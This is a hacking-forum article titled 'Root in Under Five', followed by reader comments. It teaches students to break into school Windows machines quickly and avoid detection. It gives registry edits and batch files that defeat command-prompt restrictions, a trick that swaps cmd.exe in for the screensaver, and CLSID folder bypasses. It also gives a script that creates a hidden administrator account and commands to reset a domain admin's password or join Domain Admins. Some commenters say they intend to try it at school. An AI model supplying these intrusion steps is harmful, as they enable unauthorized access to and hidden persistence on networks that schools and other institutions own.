Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.

Root in Under Five


Root in Under Five

By ghostghost | 177101 Reads |
0     0

Hey everyone. This article is about hacking schools. Since any longer than five minutes, you risk getting caught, this is hopefully going to teach you how to get root in five minutes or less. So, lets get started.

  • Dedicated to H4xguy *

To those of you that think by getting root, you own the school, sorry to disapoint you. But, by getting root, you only own the comp your on. There is however, a way to get domain root, which I’ll discuss later.

Your first step is to try and get access to DOS. You can start by clicking

"start>all programs>accessories>cmd" or "start>run> type in 'cmd'"

If neither of those work, create a new text document. Name it “anything.bat” right click on it and click edit. Type “cmd” save and close it. Open it. If you see a black box and are able to type, you now have dos.

If that didn’t work, instead of typing “cmd”, type

@echo off
echo hello
pause

Open it, if you see “hello”, create a new text document and name it “anything.reg”, right click and edit.

 REGEDIT4 
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldApp] 
"Disabled"=dword:0 
[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:0

This changes the registry value that blocks dos. So, type “cmd” in the .bat and see if it works. If that also didn’t work, theres still other ways.

If it didn’t work because for whatever reason, you can’t create a .bat, open up microsoft word, which I’m sure all schools have. Now, type in your commands and click “file>save as>” for the type, put “text document, and save as “anything.bat”. If that wasn’t the reason, I hope you have access to the C drive. If you do, go here “C:\Windows\system32" and create a new folder. Now, find “cmd.exe” and “scrnsave.scr” and copy them to the new folder. Goto the folder and rename “scrnsave.scr” to “scrnsaveold.scr”, and “cmd.exe” to “scrnsave.scr” And replace it with the real one in system32. Now the next time your screen saver appears, it will be full access dos. So, if you can, on the desktop, right click and select properties. Change the time to one minute. On windows xp, you may have to make sure the screensaver is “scrnsave”.

If that didn’t work, you can try the control panel, I’m not sure if you will be able to unblock dos from there or not, but you can try. If access to the control panel is disabled. Create a new folder and name it one of these. (only the {….} part)

Printers: {2227A280-3AEA-1069-A2DE-08002B30309D} 
Control panel: {305CA226-D286-468e-B848-2B2E8E697B74}
Dial-up networking: {992CFFA0-F557-101A-88EC-00DD010CCC48} 
Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF} 
Folder options: {6DFD7C5C-2451-11d3-A299-00C04F8EF6AF} 
Dial-Up Networking: {992CFFA0-F557-101A-88EC-00DD010CCC48} 
Scheduled tasks: {D6277990-4C6A-11CF-8D87-00AA0060F5BF} 
Taskbar and startmenu: {0DF44EAA-FF21-4412-828E-260A8728E7F1}
Microsoft FTP folder {63da6ec0-2e98-11cf-8d82-444553540000}
Temporary Internet files {7BD29E00-76C1-11CF-9DD0-00A0C9034933} 
ActiveX Cache folder {88C6C381-2E85-11D0-94DE-444553540000
Subscriptions folder {F5175861-2688-11d0-9C5E-00AA00A45957}
History {FF393560-C2A7-11CF-BFF4-444553540000}

Another way to get dos, is to create a prog. Uber0n has created such a program. You can find it at http://www.freewebs.com/uber0n/ You’ll need a c++ compiler.

If so far, nothing has worked. You need to crack the sam file. Pretty sure Cain & Abel has this option.

If you did get dos, it’s time to create yourself an admin acct. Type this.

@echo off
net user winsys password /add
net localgroup administrators winsys /add
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v winsys/t REG_DWORD /d 0

First Line just hides the file address and stuff. Second Line Creates the user “winsys” with the password of “password”. Third Line adds “winsys” to the administrators group. Fourth Line makes the acct “winsys” a hidden acct. If you see “The command completed successfully.” or something similiar, congragulations. You now have root. If it didn’t work, it means you have limited access dos, use the screensaver thing.

If you want domain root, you can either find the domain admin’s username and type

@echo off
net user [username] [newpassword]

That will change his/her pass. Or, if you can get on his/her comp, type this in dos.

net group "Domain Admins" [username] /add

This will add an acct to the domain admins.

Also, if you don’t have access to the C drive, or any other drive, theres a few ways to view it’s contents. You just need to be able to install programs. Google has a program called “Google Desktop” which indexes the computer and makes it searchable. Or, you can download a web browser such as Opera. In the url bar type this “file://” you should now see a list of drives. Enjoy.

Well, thats all for this article. Hope it’s understandable and enjoyable. If anyone else has anything to add, please let me know and I will add it. If anyone has any suggestion, please let me know.

Comments
ghost's avatar
ghost 18 years ago

not a bad article. looks really similar to one of mine, but its got a few fresh ideas. not bad mate

ghost's avatar
ghost 18 years ago

Nice, i like it… lots of ways to try to access command prompt. il be tryin those 2morrow :)

ghost's avatar
ghost 18 years ago

lol jacob, me too, espescially the CLSID folder names, I forgot about them unti now :)

ghost's avatar
ghost 18 years ago

Very nice, a lot of great info and ideas, and presented nicely :) Amazing :D

ghost's avatar
ghost 18 years ago

this is nice. Thanks for taking the time and writing this.. It will help alot of people.

ghost's avatar
ghost 18 years ago

Very nice article! I don't have the guts to try it out, though. =P

ghost's avatar
ghost 18 years ago

W00t it's dedicated to me!!!

ghost's avatar
ghost 18 years ago

also another way to get to dos is go into system32 and click the "command" file it is really called command.com but it gets you to dos in case it is blocked :ninja:

ghost's avatar
ghost 18 years ago

sorry forgot to give rating on last comment

ghost's avatar
ghost 18 years ago

forget what i just said im stupid:xx:

ghost's avatar
ghost 18 years ago

lol. Thanks for the comments, glad everyone liked it.

ghost's avatar
ghost 18 years ago

@scubesteve sometimes access to the C drive is denied on some comps…but very nice article I will be trying to add an admin account tomy school comp on monday but i doubt it will work seeing as access to regedit is denied. and what do you mean by "use the screensaver thing"

ghost's avatar
ghost 18 years ago

@ztb - whenever the screensaver comes on, the file "scrnsave.scr", in "C:\windows\system32\" is ran, so if you rename cmd.exe to "scrnsave.scr", cmd will be ran instead of the real screensaver.

ghost's avatar
ghost 18 years ago

You told us hot to gain root on Windows XP..what if your trying to gain root on a Apple iBook..I mean seriously; not all of us have Windows here..good article though. :|

ghost's avatar
ghost 17 years ago

lol i couldn't stop laughing while reading your article. try this if doesnt work try this if it doesnt work try this if it doesnt work try this…

lol that were lots of ways and at least one will work i rate it awseome just for the effort =)

Ayr4's avatar
Ayr4 17 years ago

You could also try to open notepad and type "command" and save it as test.bat and run it:)

ghost's avatar
ghost 17 years ago

I changed my cmd to scrnsave.scr and replaced the original scrnsave but windows automatically replaces it back with the original scrnsave :|

ghost's avatar
ghost 17 years ago

fti - gaining root is only applicable to *nix systems

ghost's avatar
ghost 17 years ago

@SnigelSniper - yea I think that only works on windows 2000 or less, can't remember…

ghost's avatar
ghost 16 years ago

It says access is denied when I try to create a new folder in sys32, is there any way to get access?